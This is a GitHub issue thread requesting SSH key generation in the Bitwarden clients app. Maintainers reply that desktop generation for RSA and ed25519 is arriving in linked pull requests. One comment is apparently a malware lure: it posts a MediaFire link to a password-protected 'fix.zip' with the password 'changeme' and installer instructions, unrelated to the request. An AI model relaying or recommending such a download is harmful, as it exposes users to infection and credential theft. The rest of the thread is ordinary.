### ISSUE TITLE
support for ssh key support 

### ISSUE THREAD

**Issue by olumolu** [bitwarden/clients#10726]
### Steps To Reproduce

There is no way to generate ssh key

### Expected Result

Having ssh key support is really good to have rather than having identity having ssh key generator and save helps a lot

### Actual Result

Option to generate ssh key or private and public key...with specific algos.

### Operating System

Linux

### Operating System Version

6.10

### Installation method

Snap, Other

### Build Version

0.0.0

### Issue Tracking Info

- [X] I understand that work is tracked outside of GitHub. A PR will be linked to this issue should one be opened to address it, but Bitwarden doesn't use fields like "assigned", "milestone", or "project" to track progress.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by djsmith85** [comment]
@olumolu As mentioned this is a feature request, but there is some work currently in progress to add SSH as a new item type (saving/importing/exporting SSH keys) with: https://github.com/bitwarden/clients/pull/10360

A potential follow-up could be to add generation possibilities, but currently there are no plans for this. Please create a feature request for this.

**Comment by quexten** [comment]
@djsmith85 The first release includes generator support on desktop for RSA (2048, 3072 and 4096 bit) and for ed25519. Only on other platform generator is not possible (for now). The generator is added in https://github.com/bitwarden/clients/pull/10293

**Comment by olumolu** [comment]
> @djsmith85 @olumolu The first release of ssh keys will include generator support on desktop for RSA (2048, 3072 and 4096 bit) and for ed25519. Only on other platforms, generating ssh keys will not be possible (for now). The generator is added in #10293 , which also implements ssh-agent support

I saw it is supported in goldwaren which is a gtk4 bitwarden written in go. Which is better than original bitwarden app. Still having support in offical version makes it a better option.
